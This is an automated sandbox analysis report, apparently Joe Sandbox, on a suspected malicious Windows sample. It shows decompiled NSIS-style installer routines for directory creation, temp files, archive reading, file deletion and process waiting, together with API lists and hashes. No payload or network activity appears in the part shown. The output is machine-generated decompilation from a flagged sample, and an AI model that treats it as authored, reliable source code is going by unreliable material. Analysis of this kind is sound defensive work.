            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: DirectoryLibraryLoadSystemwsprintf
            • String ID: %s%S.dll$UXTHEME$\
            • API String ID: 2200240437-1946221925
            • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
            • Instruction ID: edb644a17e19fa0d5d66c6da3b257654e99a3b388903ea93700411201bdfbebd
            • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
            • Instruction Fuzzy Hash: 37F0F671600219A7DB14BB64DD0EF9B376CAB00304F11447AA646F10D0FB7CDB68CB98
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 563 405b9f-405bea CreateDirectoryW 564 405bf0-405bfd GetLastError 563->564 565 405bec-405bee 563->565 566 405c17-405c19 564->566 567 405bff-405c13 SetFileSecurityW 564->567 565->566 567->565 568 405c15 GetLastError 567->568 568->566
            C-Code - Quality: 100%
            			E00405B9F(WCHAR* _a4) {
            				struct _SECURITY_ATTRIBUTES _v16;
            				struct _SECURITY_DESCRIPTOR _v36;
            				int _t22;
            				long _t23;
            
            				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
            				_v36.Owner = 0x4083f8;
            				_v36.Group = 0x4083f8;
            				_v36.Sacl = _v36.Sacl & 0x00000000;
            				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
            				_v16.lpSecurityDescriptor =  &_v36;
            				_v36.Revision = 1;
            				_v36.Control = 4;
            				_v36.Dacl = 0x4083e8;
            				_v16.nLength = 0xc;
            				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
            				if(_t22 != 0) {
            					L1:
            					return 0;
            				}
            				_t23 = GetLastError();
            				if(_t23 == 0xb7) {
            					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
            						goto L1;
            					}
            					return GetLastError();
            				}
            				return _t23;
            			}







            0x00405baa
            0x00405bae
            0x00405bb1
            0x00405bb7
            0x00405bbb
            0x00405bbf
            0x00405bc7
            0x00405bce
            0x00405bd4
            0x00405bdb
            0x00405be2
            0x00405bea
            0x00405bec
            0x00000000
            0x00405bec
            0x00405bf6
            0x00405bfd
            0x00405c13
            0x00000000
            0x00000000
            0x00000000
            0x00405c15
            0x00405c19

            APIs
            • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2
            • GetLastError.KERNEL32 ref: 00405BF6
            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C0B
            • GetLastError.KERNEL32 ref: 00405C15
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC5
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: ErrorLast$CreateDirectoryFileSecurity
            • String ID: C:\Users\user\AppData\Local\Temp\
            • API String ID: 3449924974-3081826266
            • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
            • Instruction ID: a4b5b825bdd4266eac6b0ee8a32438dce20ed58698919e53373cd8165130f89a
            • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
            • Instruction Fuzzy Hash: 31010871D04219EAEF009BA0C944BEFBFB8EF04314F00403AD545B6191E7799A48CF99
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 569 40618d-406199 570 40619a-4061ce GetTickCount GetTempFileNameW 569->570 571 4061d0-4061d2 570->571 572 4061dd-4061df 570->572 571->570 573 4061d4 571->573 574 4061d7-4061da 572->574 573->574
            C-Code - Quality: 100%
            			E0040618D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
            				intOrPtr _v8;
            				short _v12;
            				short _t12;
            				intOrPtr _t13;
            				signed int _t14;
            				WCHAR* _t17;
            				signed int _t19;
            				signed short _t23;
            				WCHAR* _t26;
            
            				_t26 = _a4;
            				_t23 = 0x64;
            				while(1) {
            					_t12 =  *L"nsa"; // 0x73006e
            					_t23 = _t23 - 1;
            					_v12 = _t12;
            					_t13 =  *0x40a5ac; // 0x61
            					_v8 = _t13;
            					_t14 = GetTickCount();
            					_t19 = 0x1a;
            					_v8 = _v8 + _t14 % _t19;
            					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
            					if(_t17 != 0) {
            						break;
            					}
            					if(_t23 != 0) {
            						continue;
            					} else {
            						 *_t26 =  *_t26 & _t23;
            					}
            					L4:
            					return _t17;
            				}
            				_t17 = _t26;
            				goto L4;
            			}












            0x00406193
            0x00406199
            0x0040619a
            0x0040619a
            0x0040619f
            0x004061a0
            0x004061a3
            0x004061a8
            0x004061ab
            0x004061b5
            0x004061c2
            0x004061c6
            0x004061ce
            0x00000000
            0x00000000
            0x004061d2
            0x00000000
            0x004061d4
            0x004061d4
            0x004061d4
            0x004061d7
            0x004061da
            0x004061da
            0x004061dd
            0x00000000

            APIs
            • GetTickCount.KERNEL32 ref: 004061AB
            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,00403644,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 004061C6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: CountFileNameTempTick
            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
            • API String ID: 1716503409-678247507
            • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
            • Instruction ID: 4618a7cd5e379287717806b061479f75a97df545f28ae60e57938b9bb9b89627
            • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
            • Instruction Fuzzy Hash: 4CF09676700214BFDB008F55ED05E9AB7BCEF91710F11803AEE05E7150E6B099548764
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 575 403c2b-403c3a 576 403c46-403c4e 575->576 577 403c3c-403c3f CloseHandle 575->577 578 403c50-403c53 CloseHandle 576->578 579 403c5a-403c66 call 403c88 call 405d7a 576->579 577->576 578->579 583 403c6b-403c6c 579->583
            C-Code - Quality: 100%
            			E00403C2B() {
            				void* _t1;
            				void* _t2;
            				void* _t4;
            				signed int _t11;
            
            				_t1 =  *0x40a018; // 0xffffffff
            				if(_t1 != 0xffffffff) {
            					CloseHandle(_t1);
            					 *0x40a018 =  *0x40a018 | 0xffffffff;
            				}
            				_t2 =  *0x40a01c; // 0xffffffff
            				if(_t2 != 0xffffffff) {
            					CloseHandle(_t2);
            					 *0x40a01c =  *0x40a01c | 0xffffffff;
            					_t11 =  *0x40a01c;
            				}
            				E00403C88();
            				_t4 = E00405D7A(_t11, L"C:\\Users\\jones\\AppData\\Local\\Temp\\nsfF27F.tmp\\", 7); // executed
            				return _t4;
            			}







            0x00403c2b
            0x00403c3a
            0x00403c3d
            0x00403c3f
            0x00403c3f
            0x00403c46
            0x00403c4e
            0x00403c51
            0x00403c53
            0x00403c53
            0x00403c53
            0x00403c5a
            0x00403c66
            0x00403c6c

            APIs
            • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B77,?), ref: 00403C3D
            • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B77,?), ref: 00403C51
            Strings
            • C:\Users\user\AppData\Local\Temp\nsfF27F.tmp\, xrefs: 00403C61
            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C30
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: CloseHandle
            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsfF27F.tmp\
            • API String ID: 2962429428-3409902602
            • Opcode ID: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
            • Instruction ID: 4491f7c80fa00ae2087dec4a459748e9e372b7f9a3145cafecdefc003a92e639
            • Opcode Fuzzy Hash: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
            • Instruction Fuzzy Hash: F3E0863244471896D1347F7DAE4D9853B195F413327204326F178F20F0C7389AA74A99
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 584 403377-403384 585 4033a2-4033ab call 40347f 584->585 586 403386-40339c SetFilePointer 584->586 589 4033b1-4033c4 call 4061e1 585->589 590 403479-40347c 585->590 586->585 593 403469 589->593 594 4033ca-4033dd call 40347f 589->594 596 40346b-40346c 593->596 598 4033e3-4033e6 594->598 599 403477 594->599 596->590 600 403445-40344b 598->600 601 4033e8-4033eb 598->601 599->590 602 403450-403467 ReadFile 600->602 603 40344d 600->603 601->599 604 4033f1 601->604 602->593 605 40346e-403471 602->605 603->602 606 4033f6-403400 604->606 605->599 607 403402 606->607 608 403407-403419 call 4061e1 606->608 607->608 608->593 611 40341b-403422 call 406210 608->611 613 403427-403429 611->613 614 403441-403443 613->614 615 40342b-40343d 613->615 614->596 615->606 616 40343f 615->616 616->599
            C-Code - Quality: 92%
            			E00403377(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
            				long _v8;
            				long _t21;
            				long _t22;
            				void* _t24;
            				long _t26;
            				int _t27;
            				long _t28;
            				void* _t30;
            				long _t31;
            				long _t32;
            				long _t36;
            
            				_t21 = _a4;
            				if(_t21 >= 0) {
            					_t32 = _t21 +  *0x7a8af8;
            					 *0x79f734 = _t32;
            					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
            				}
            				_t22 = E0040347F(4);
            				if(_t22 >= 0) {
            					_t24 = E004061E1( *0x40a01c,  &_a4, 4); // executed
            					if(_t24 == 0) {
            						L18:
            						_push(0xfffffffd);
            						goto L19;
            					} else {
            						 *0x79f734 =  *0x79f734 + 4;
            						_t36 = E0040347F(_a4);
            						if(_t36 < 0) {
            							L21:
            							_t22 = _t36;
            						} else {
            							if(_a12 != 0) {
            								_t26 = _a4;
            								if(_t26 >= _a16) {
            									_t26 = _a16;
            								}
            								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
            								if(_t27 != 0) {
            									_t36 = _v8;
            									 *0x79f734 =  *0x79f734 + _t36;
            									goto L21;
            								} else {
            									goto L18;
            								}
            							} else {
            								if(_a4 <= 0) {
            									goto L21;
            								} else {
            									while(1) {
            										_t28 = _a4;
            										if(_a4 >= 0x4000) {
            											_t28 = 0x4000;
            										}
            										_v8 = _t28;
            										if(E004061E1( *0x40a01c, 0x793730, _t28) == 0) {
            											goto L18;
            										}
            										_t30 = E00406210(_a8, 0x793730, _v8); // executed
            										if(_t30 == 0) {
            											_push(0xfffffffe);
            											L19:
            											_pop(_t22);
            										} else {
            											_t31 = _v8;
            											_a4 = _a4 - _t31;
            											 *0x79f734 =  *0x79f734 + _t31;
            											_t36 = _t36 + _t31;
            											if(_a4 > 0) {
            												continue;
            											} else {
            												goto L21;
            											}
            										}
            										goto L22;
            									}
            									goto L18;
            								}
            							}
            						}
            					}
            				}
            				L22:
            				return _t22;
            			}














            0x0040337b
            0x00403384
            0x0040338d
            0x00403391
            0x0040339c
            0x0040339c
            0x004033a4
            0x004033ab
            0x004033bd
            0x004033c4
            0x00403469
            0x00403469
            0x00000000
            0x004033ca
            0x004033cd
            0x004033d9
            0x004033dd
            0x00403477
            0x00403477
            0x004033e3
            0x004033e6
            0x00403445
            0x0040344b
            0x0040344d
            0x0040344d
            0x0040345f
            0x00403467
            0x0040346e
            0x00403471
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x004033e8
            0x004033eb
            0x00000000
            0x004033f1
            0x004033f6
            0x004033fd
            0x00403400
            0x00403402
            0x00403402
            0x0040340f
            0x00403419
            0x00000000
            0x00000000
            0x00403422
            0x00403429
            0x00403441
            0x0040346b
            0x0040346b
            0x0040342b
            0x0040342b
            0x0040342e
            0x00403431
            0x00403437
            0x0040343d
            0x00000000
            0x0040343f
            0x00000000
            0x0040343f
            0x0040343d
            0x00000000
            0x00403429
            0x00000000
            0x004033f6
            0x004033eb
            0x004033e6
            0x004033dd
            0x004033c4
            0x00403479
            0x0040347c

            APIs
            • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 0040339C
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: FilePointer
            • String ID: 07y
            • API String ID: 973152223-1660179758
            • Opcode ID: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
            • Instruction ID: 558639dd8831905cecc0235a21772d735375f1fafe9af626847c4dd8eee9aa20
            • Opcode Fuzzy Hash: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
            • Instruction Fuzzy Hash: 73319330201218FFDF129FA5ED85D9E3F68EB00359F10803AF905E9190D778DA51DBA9
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 617 4015c1-4015d5 call 402da6 call 405fe8 622 401631-401634 617->622 623 4015d7-4015ea call 405f6a 617->623 625 401663-4022f6 call 401423 622->625 626 401636-401655 call 401423 call 40666e SetCurrentDirectoryW 622->626 631 401604-401607 call 405c1c 623->631 632 4015ec-4015ef 623->632 641 402c2a-402c39 625->641 642 40292e-402935 625->642 626->641 644 40165b-40165e 626->644 640 40160c-40160e 631->640 632->631 637 4015f1-4015f8 call 405c39 632->637 637->631 648 4015fa-4015fd call 405b9f 637->648 645 401610-401615 640->645 646 401627-40162f 640->646 642->641 644->641 649 401624 645->649 650 401617-401622 GetFileAttributesW 645->650 646->622 646->623 653 401602 648->653 649->646 650->646 650->649 653->640
            C-Code - Quality: 86%
            			E004015C1(short __ebx, void* __eflags) {
            				void* _t17;
            				int _t23;
            				void* _t25;
            				signed char _t26;
            				short _t28;
            				short _t31;
            				short* _t34;
            				void* _t36;
            
            				_t28 = __ebx;
            				 *(_t36 + 8) = E00402DA6(0xfffffff0);
            				_t17 = E00405FE8(_t16);
            				_t32 = _t17;
            				if(_t17 != __ebx) {
            					do {
            						_t34 = E00405F6A(_t32, 0x5c);
            						_t31 =  *_t34;
            						 *_t34 = _t28;
            						if(_t31 != _t28) {
            							L5:
            							_t25 = E00405C1C( *(_t36 + 8));
            						} else {
            							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
            							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C39(_t42) == 0) {
            								goto L5;
            							} else {
            								_t25 = E00405B9F( *(_t36 + 8)); // executed
            							}
            						}
            						if(_t25 != _t28) {
            							if(_t25 != 0xb7) {
            								L9:
            								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
            							} else {
            								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
            								if((_t26 & 0x00000010) == 0) {
            									goto L9;
            								}
            							}
            						}
            						 *_t34 = _t31;
            						_t32 = _t34 + 2;
            					} while (_t31 != _t28);
            				}
            				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
            					_push(0xfffffff5);
            					E00401423();
            				} else {
            					E00401423(0xffffffe6);
            					E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp",  *(_t36 + 8));
            					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
            					if(_t23 == 0) {
            						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
            					}
            				}
            				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t36 - 4));
            				return 0;
            			}











            0x004015c1
            0x004015c9
            0x004015cc
            0x004015d1
            0x004015d5
            0x004015d7
            0x004015df
            0x004015e1
            0x004015e4
            0x004015ea
            0x00401604
            0x00401607
            0x004015ec
            0x004015ec
            0x004015ef
            0x00000000
            0x004015fa
            0x004015fd
            0x004015fd
            0x004015ef
            0x0040160e
            0x00401615
            0x00401624
            0x00401624
            0x00401617
            0x0040161a
            0x00401622
            0x00000000
            0x00000000
            0x00401622
            0x00401615
            0x00401627
            0x0040162b
            0x0040162c
            0x004015d7
            0x00401634
            0x00401663
            0x004022f1
            0x00401636
            0x00401638
            0x00401645
            0x0040164d
            0x00401655
            0x0040165b
            0x0040165b
            0x00401655
            0x00402c2d
            0x00402c39

            APIs
              • Part of subcall function 00405FE8: CharNextW.USER32(?,?,007A4790,?,0040605C,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560,00000000), ref: 00405FF6
              • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
              • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013
            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
              • Part of subcall function 00405B9F: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2
            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
            Strings
            • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: CharNext$Directory$AttributesCreateCurrentFile
            • String ID: C:\Users\user\AppData\Local\Temp
            • API String ID: 1892508949-47812868
            • Opcode ID: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
            • Instruction ID: 957f66bc23545469dbc724fd3d157a479205f5e7ec4e330cdfccc87aa14dd729
            • Opcode Fuzzy Hash: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
            • Instruction Fuzzy Hash: 3111E231408115EBCF217FA5CD4099E36A0EF15369B28493BFA01B22F1DA3E49829B5E
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 654 405d32-405d43 call 406139 657 405d73 654->657 658 405d45-405d4b 654->658 661 405d75-405d77 657->661 659 405d55 DeleteFileW 658->659 660 405d4d-405d53 RemoveDirectoryW 658->660 662 405d5b-405d5d 659->662 660->662 663 405d64-405d69 662->663 664 405d5f-405d62 662->664 663->657 665 405d6b-405d6d SetFileAttributesW 663->665 664->661 665->657
            C-Code - Quality: 41%
            			E00405D32(void* __eflags, WCHAR* _a4, signed int _a8) {
            				int _t9;
            				long _t13;
            				WCHAR* _t14;
            
            				_t14 = _a4;
            				_t13 = E00406139(_t14);
            				if(_t13 == 0xffffffff) {
            					L8:
            					return 0;
            				}
            				_push(_t14);
            				if((_a8 & 0x00000001) == 0) {
            					_t9 = DeleteFileW();
            				} else {
            					_t9 = RemoveDirectoryW(); // executed
            				}
            				if(_t9 == 0) {
            					if((_a8 & 0x00000004) == 0) {
            						SetFileAttributesW(_t14, _t13);
            					}
            					goto L8;
            				} else {
            					return 1;
            				}
            			}






            0x00405d33
            0x00405d3e
            0x00405d43
            0x00405d73
            0x00000000
            0x00405d73
            0x00405d4a
            0x00405d4b
            0x00405d55
            0x00405d4d
            0x00405d4d
            0x00405d4d
            0x00405d5d
            0x00405d69
            0x00405d6d
            0x00405d6d
            0x00000000
            0x00405d5f
            0x00000000
            0x00405d61

            APIs
              • Part of subcall function 00406139: GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
              • Part of subcall function 00406139: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152
            • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F14), ref: 00405D4D
            • DeleteFileW.KERNEL32(?,?,?,00000000,00405F14), ref: 00405D55
            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D6D
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: File$Attributes$DeleteDirectoryRemove
            • String ID:
            • API String ID: 1655745494-0
            • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
            • Instruction ID: 65d886778d981234f1bc095319bf1530848ff53bfe772b7143d7b60a17f83489
            • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
            • Instruction Fuzzy Hash: E1E0E531204EA056C7106B35AD0CF5B2A98EF86314F05893FF592B10D0D77888078AAE
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 666 406ae6-406afe WaitForSingleObject 667 406b0e-406b10 666->667 668 406b00-406b0c call 406a77 WaitForSingleObject 667->668 669 406b12-406b25 GetExitCodeProcess 667->669 668->667
            C-Code - Quality: 100%
            			E00406AE6(void* __ecx, void* _a4) {
            				long _v8;
            				long _t6;
            
            				_t6 = WaitForSingleObject(_a4, 0x64);
            				while(_t6 == 0x102) {
            					E00406A77(0xf);
            					_t6 = WaitForSingleObject(_a4, 0x64);
            				}
            				GetExitCodeProcess(_a4,  &_v8); // executed
            				return _v8;
            			}





            0x00406af7
            0x00406b0e
            0x00406b02
            0x00406b0c
            0x00406b0c
            0x00406b19
            0x00406b25

            APIs
